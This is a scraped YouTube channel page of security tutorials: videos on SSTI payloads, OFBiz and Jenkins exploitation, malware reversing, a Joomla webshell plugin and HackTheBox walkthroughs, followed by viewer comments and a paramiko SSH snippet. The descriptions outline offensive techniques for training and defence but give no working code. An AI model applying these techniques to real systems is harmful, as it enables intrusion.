- Видео 301
- Просмотров 279 628
0xdf
США
Добавлен 20 окт 2018
Python Flask Jinja2 SSTI Payload Analysis
I'll walk through a common SSTI payload pulled from PayloadsAllTheThings and look at how it works, using the Flask request object to get a function, which gives access to the __globals__. From there it gets the __builtins__ dictionary and the __import__ function.
Payload: github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinja2---filter-bypass
Flask Request object: flask.palletsprojects.com/en/3.0.x/api/#flask.Request
Flask globals: flask.palletsprojects.com/en/3.0.x/templating/#standard-context
Jinja2 attr: jinja.palletsprojects.com/en/3.1.x/templates/#jinja-filters.attr
Python Function attributes: docs.python.org/3/reference/datamodel.html...
Payload: github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinja2---filter-bypass
Flask Request object: flask.palletsprojects.com/en/3.0.x/api/#flask.Request
Flask globals: flask.palletsprojects.com/en/3.0.x/templating/#standard-context
Jinja2 attr: jinja.palletsprojects.com/en/3.1.x/templates/#jinja-filters.attr
Python Function attributes: docs.python.org/3/reference/datamodel.html...
Просмотров: 1 008
Видео
Digging into OFBiz Exploitation
Просмотров 9162 месяца назад
There was a diary on the Sans Internet Storm Center page about increased exploitation attempts at their honeypots for CVE-2024-32113, which gives RCE against Apache OFBiz instances. I'll show how the exploit works on the HackTheBox Bizness machine, and then look at the patches to fix CVE-2024-32113, and then where the exploit is actually fixed in the patches for CVE-2024-36104. Sans ISC Article...
Splunk Docker Container for CloudTrail Analysis
Просмотров 1 тыс.4 месяца назад
When it comes to analysis of a large set of log files, it can be super useful to have an instance of Splunk available to work with. Getting Splunk set up can be intimidating, but it doesn't have to be. I'll show how to stand up a Splunk Docker container and load AWS Cloudtrail logs into it. Splunk Docker: docs.splunk.com/Documentation/Splunk/9.2.1/Installation/DeployandrunSplunkEnterpriseinside...
Hash Extension Attack [HackTheBox Ouija]
Просмотров 8555 месяцев назад
In Ouija, I need to do a Hash Extension attack to escalate access against an API. The issue is that I don't know the secret length. I'll use Python to write a wrapper around hash_extender to try lengths one by one and test them against the API until I find the right length, which means I have a valid hash. HackTheBox Ouija Blog post: 0xdf.gitlab.io/2024/05/18-htb-ouija.html HackTheBox Ouija: ww...
Reversing APT29 Duke Malware
Просмотров 1,3 тыс.5 месяцев назад
I'm looking at three binary files. The first is a legit Microsoft signed exe. The second is a stub DLL that does nothing. The third is APT 29 malware that is DLL side-loaded by the legit executable. I'll show how the DLL opens the decoy document, loads wininet.dll using LdrLoadDll, and then connects to a the Zulip chat service for C2 (including the username and password). This malware comes fro...
HackTheBox Napper: Read Elastic, Generate Key, Decrypt Blob in Golang
Просмотров 4535 месяцев назад
In Napper from HackTheBox, I'll need to pull values from an Elastic database that rotated every 5 minutes. The values are a seed and an encrypted blob. I'll use the seed with the random function in Go to generate a key, and use it to AES decrypt the blob. So today we're working in Go! HackTheBox Napper Blog post: 0xdf.gitlab.io/2024/05/04/htb-napper.html HackTheBox Napper: www.hackthebox.com/ma...
JavaScript / Bat File Polyglot Malware Dropper
Просмотров 6005 месяцев назад
I've got a `unc.js` file that is actually a polyglot, a file that meets the specs of two different languages / formats. It's not only JavaScript, but a valid Windows bat file. I'll show how to deobfuscate both the JS and the bat to see how it drops and runs a Windows binary. This malware comes from HackTheBox's Einladen Sherlock. HackTheBox Einladen Blog post: 0xdf.gitlab.io/2024/05/02/htb-sher...
Decrypting AsyncRAT Configuration Values with CyberChef
Просмотров 5055 месяцев назад
I've got a malware sample that has a bunch of configuration values that are decrypted using AES, but not in the standard way that CyberChef would do it. I'll show how the program is setup, and then pivot to CyberChef using many operations, including Register, Derive PBKDF2 key, and AES Decrypt to get the IV and ciphertext, generate the key, and decrypt the value. This malware comes from the Ein...
Writing a Webshell Joomla Plugin [HackTheBox - DevVortex]
Просмотров 5036 месяцев назад
I found myself with Super Admin access to a Joomla site. I thought (incorrectly) that I couldn't edit the templates, so I set out to write a malicious plugin to provide a webshell, which I'll show in this video. HackTheBox DevVortex Blog post: 0xdf.gitlab.io/2024/04/27/htb-devvortex.html HackTheBox DevVortex: www.hackthebox.com/machines/devvortex Joomla Plugin Docs: docs.joomla.org/J4.x:Creatin...
Gameover(lay) Exploit Explained
Просмотров 6947 месяцев назад
The Gameover(lay) (CVE-2023-2640 / CVE-2023-32629) vulnerability was a big deal in late July 2023. The POC is super short, and yet complex. We'll walk through the lines one by one, and understand what it's doing and how it provides a low privilege user root access by abusing the OverlayFS and how it manages file attributes (like capabilities) when syncing between upper and lower. Exploit: unsha...
Playing with Jenkins File Read [CVE-2024-23897]
Просмотров 3,5 тыс.8 месяцев назад
I'm looking at CVE-2024-23897, a partial file read vulnerability in Jenkins that leads to RCE. The goal of this video is to understand the vulenrability and look at a Python POC for the exploit, understand what it does, and then run it and compare it to the output when exploiting manually with the Jenkins CLI (using Java as a Jar file). Jenkins CVE-2024-23897 disclosure: www.jenkins.io/security...
Exploring Docker Registry Auth [HackTheBox RegistryTwo]
Просмотров 6018 месяцев назад
I'm looking at a docker registry server and an auth server. I'll show how I can manually request a token from the auth server, and then use Wireshark and Burp to look at how docker does that for me when running docker pull. HackTheBox RegistryTwo: www.hackthebox.com/machines/registrytwo RegistryTwo Blog Post: 0xdf.gitlab.io/2024/02/03/htb-registrytwo.html#docker-registry tcp-5000 5001 DockerReg...
Automating Malicious Zip with Symlinks [HackTheBox Zipping]
Просмотров 8349 месяцев назад
In the Zipping box from HackTheBox, I can read files from the target host by submitting a zip file containing a symlink to the file I want to read. That can be done manually, but I'll want to script it to make life easier for myself. In this video, I'll show the vulnerability and then write the script. I'll use zipfile, io.BytesIO, regex, and requests. I'll update the script to handle cleanly b...
Linux 101 [Sans Holiday Hack 2023]
Просмотров 7389 месяцев назад
The Linux 101 terminal in the 2023 Holiday Hack Challenge is a great chance to learn Linux command line tricks and techniques. Holiday Hack 2023 Solution: 0xdf.gitlab.io/holidayhack2023/ Holiday Hack 2023 Game: 2023.holidayhackchallenge.com/ ☕ Buy Me A Coffee: www.buymeacoffee.com/0xdf [00:00] Introduction [00:30] Q1 - Terminal Overview [00:47] Q2 - ls [00:56] Q3 - cat [01:20] Q4 - rm [01:38] Q...
Hacking Reportinator [Sans Holiday Hack 2023]
Просмотров 3109 месяцев назад
In the Reportinator challenge, I'm asked to evaluate findings written by an AI and find ones that are wrong or don't make sense. In this video, I'll look at how the answers are submitted and use the Python httx async library to brute force all possible combinations and find the answer. Holiday Hack 2023 Solution: 0xdf.gitlab.io/holidayhack2023/ Holiday Hack 2023 Game: 2023.holidayhackchallenge....
Hacking Luggage Lock [Sans Holiday Hack 2023]
Просмотров 2719 месяцев назад
Hacking Luggage Lock [Sans Holiday Hack 2023]
Day 25: Snowverload [AOC2023 Python]
Просмотров 26010 месяцев назад
Day 25: Snowverload [AOC2023 Python]
Day 24: Never Tell Me The Odds [AOC2023 Python]
Просмотров 20510 месяцев назад
Day 24: Never Tell Me The Odds [AOC2023 Python]
Day 22: Sand Slabs [AOC2023 Python]
Просмотров 15410 месяцев назад
Day 22: Sand Slabs [AOC2023 Python]
Day 21: Step Counter [AOC2023 Python]
Просмотров 34010 месяцев назад
Day 21: Step Counter [AOC2023 Python]
Day 20: Pulse Propagation [AOC2023 Python]
Просмотров 17410 месяцев назад
Day 20: Pulse Propagation [AOC2023 Python]
Day 18: Lavaduct Lagoon [AOC2023 Python]
Просмотров 17410 месяцев назад
Day 18: Lavaduct Lagoon [AOC2023 Python]
Day 17: Clumsy Crucible [AOC2023 Python]
Просмотров 37610 месяцев назад
Day 17: Clumsy Crucible [AOC2023 Python]
Reversing and Brute-Forcing TOPT Browser Plugin Export [HackTheBox Coder]
Просмотров 31810 месяцев назад
Reversing and Brute-Forcing TOPT Browser Plugin Export [HackTheBox Coder]
Modifying .NET Exe: Encrypt to Decrypt [HackTheBox Coder]
Просмотров 65010 месяцев назад
Modifying .NET Exe: Encrypt to Decrypt [HackTheBox Coder]
Day 16: The Floor Will Be Laba [AOC2023 Python]
Просмотров 10510 месяцев назад
Day 16: The Floor Will Be Laba [AOC2023 Python]
Day 15: Lens Library [AOC2023 Python]
Просмотров 11610 месяцев назад
Day 15: Lens Library [AOC2023 Python]
Day 14: Parabolic Reflector Dish [AOC2023 Python]
Просмотров 16710 месяцев назад
Day 14: Parabolic Reflector Dish [AOC2023 Python]
Very detailed video. Need more on this type of data sanitization techniques.
good one
started doing HTB as soon as i finished the google cert and ive never been so motivated. searched up on DNS C2 analysis to see what it entailed. Thank you for sharing, its clear you have experience in this field and the level of intuition is what im striving for!
how did you know to use that payload as the username?
check out the link to the full writeup for that!
thank you very much - very good explained
I followed along with you on VS code and I did not get the same results as you. I triple checked my code and no "Hello" return, nothing was the same. Help!
bro you were using kali linux or windows. ubuntu or other version of linux would work too but not windows. So keep that in mind.
Coming back to comment on this video again. I am currently working on a HTB reversing challenge. x86 ELF written in Rust. The challenge and the script is similar to this one. But for some reason I am unable to crack it and find the HTB{flag}. I had the assumption it may have had a stack overflow vulnerability but now Im certain that wasn't it. I set breakpoints similar to this video. After i enter c to hit the second one, it makes me type in a phrase I have to figure out. it then jumps to a breakpoint after it. I have breakpoints set to a function it goes to called check_flag. The main relevant parts of the script and that function I see are where theres cmp assembly instructions. No matter what I do, even when i manually set the cmp breakpoints registers to the correct value, I cannot seem to find anywhere where the phrase is, doing x/s, x/16, x/32, x/16i etc. I can even navigate the script til the very end by breakpoint completely and move pass and stepi all the places in the script without getting a SIG error. Its been driving me nuts, I am not sure what I am doing wrong. I also dont see the ------------------------stack--------------------- content like this video has at my breakpoints, I can only see additonal content if I enter info frame or disassemble. Also use ghidra alongside it.
This is an absolute gem. Using the same exact language and tools on a rust elf.
Excellent - and exactly what I was looking for!!!
You are the best ❤❤❤
This is absolutely fantastic. I agree that this would also be perfect for medium and up difficulty for learning!
Currently available for almost all retired easy and medium machines!
sorry i don't know a lot about and I understand the part of the code, so almost all the video, but I don't understand the final part, what have we obtained?
we have managed to write a webshell to the box. a webshell is basically a script (in this case PHP) that will run system commands on the box based on incoming HTTP requests.
mint af. great to hear this explained in detail
Intro gave me a seizure, thanks
Very interesting. Thank you for taking the time to explain it.
Awesome! As usual:)
What Linux distribution do you use?
My hacking VM is Ubuntu Mate.
this was very helpful I admire you for being able to explain such intrinsic concepts of the Python language so well. I hope one day to reach your level.
Very new to this python debugging technique. Solved the machine earlier but found your video on how to create and debug python code. Amazing stuff. Bravo
It would be nice if you can put that bash file on a github repo!
hii, can you share how do you research, like suppose you you've got a new term or tech stack, so how would you from knowing nothing to get something to make use of to get the work done, the main question is how do you look for that what you want sorry for bad english
Hey! So learning to google well and find stuff is the one of the most important skills in hacking. Like, understanding the tech is good, but knowing how to find things is critical. I'll have to think about if I can explain my strategy. A lot of it just comes with practice.
Hey 0xdf, I saw that you solved almost all boxes in HTB. Do you solve them all by yourself?
I mostly work on my own, though I have a good group of friends that I bound ideas off when I'm stuck.
@@0xdf cool, bro. Do you plan to solve all boxes?
@@AUBCodeII I mean, there's a new one every week, so it's kind of a moving target. I had them all at one point. I think I'm missing 5 right now. I'll get to them before they retire. As far as I know, my blog is the only site on the internet with a writeup for every retired HTB machine, which I'm proud of.
@@0xdf I see. Congrats for the discipline to complete almost every box and thanks for writing detailed write-ups. You rock
@@AUBCodeII Thank you! It's been a lot of work, but it's been mostly enjoyable along the way!
Excited for your new box releasing this Saturday and thanks, because your writeups helped me a lot. Have a great day.
Me too! I hope people like it. And thanks for taking the time to leave a comment. It means a lot!
Awesome explanation! I always wondered how this shell upgrade works. You explained it really well.
Thanks!
Maybe you rarely discuss this, I would like to know regarding the environment you use for hacking (OS, VM etc) if you can tell me to use it as a reference
I typically work from an Ubunut Mate VM. I have a Windows VM as well that I use with the FlareVM installer.
What if the target server is Windows? What file do we need to search to obtain sensitive information?
would have to look in more detail into what jenkins stores where on windows. would probably be worth spinning up a Windows VM and installing jenkins to check it out.
@@0xdf I really search well but I didn't found any CVE or github report for windows. Yeah I should try installing jenkins on VM, thanks
Code for ssh instance to authenticate username and password: class SSHServer(paramiko.ServerInterface): def __init__(self, username, password): self.event = threading.Event() self.username = username self.password = password self.authenticated = False def check_channel_request(self, kind, channel): if kind == 'session': return paramiko.OPEN_SUCCEEDED return paramiko.REJECT def check_auth_password(self, username, password): if username == self.username and password == self.password: self.authenticated = True return paramiko.AUTH_SUCCESSFUL return paramiko.AUTH_FAILED # def check_auth_publickey(self, username, key): # return paramiko.AUTH_FAILED def check_channel_shell_request(self, channel): self.event.set() return True def check_channel_pty_request( self, channel, term, width, height, pixelwidth, pixelheight, modes ): return True Hope it helps
Thx :)
Hey, Can you create solve videos for Hard sherlocks. I read your writeups and it's really helpful but a video would be better.
Hey, been a bit behind on content during summer travels and such. Any particular sherlock?
What is your Linux distribution?
Ubuntu Mate
What is your Linux distribution?
Ubuntu Mate
do you play mtg arena ?
Occasionally, yes :)
greatttttttttttttt
Thank you for this! Attempting a rust decomp challenge rn and it's driving me nuts lol
cool😍😍
Hey, 0xdf. Let's get OSEE before John Hammond does
Please, if possible, cover these advanced topics like How to bypass Drupal CMS or other secured CMS? How to bypass HARD WAF protection that stops HTML, SQL, and XSS injection payloads? Payload single-double-triple encoding using Cyber-Chef? How to find the real origin IP of secured websites behind Cloudflare, Akamai, ModSecurity, AWS CDN, etc.,? How to bypass Hard WAF using SQLMAP or Burpsuite? How to find hidden vulnerable parameters and endpoints inside the .js and .jason files? How to find hidden admin pages, cPanel pages, and WHM pages ? Please cover these important topics. Thanks
nice guide, thank you
Danke
Next time DELETE SQLI sir
hello , thank you for your videos, i follow you also on linkedin, would you please share a list of youtube channel such as yours , simple quiet and lot of beneficial ,thank you man
Obviously Ippsec. John Hammand, LiveOverflow, NetworkChuck...
@@0xdf thank you and have a nice day
@@alexhichamk6630 xct
> Splunk > CloudTrail yep i knew you would be talking about nubilium1/2 haha
Yeah, I'm stucking on nubilium2 and waited for someone to actually post a guide about it! SO BLESSED
Push!
Hello sir 👋👋
GOOD!🎉
Hey man I’m new like a complete beginner trying to do projects and I chose a honey pot is this like exactly how to build a honey pot bc for an example I decided to follow the video and I’m gonna go off your code and try understanding it but this is how to create a honeypot right now?
Hey, this is one way. If I were starting from scratch I may just deploy an existing honeypot project like cowrie
I really love your content. Thanks!
By far the best analysis I've seen about APT29. Thank you so much, sir!
Great breakdown!
Thanks for sharing as always, love the content, your amazing my friend.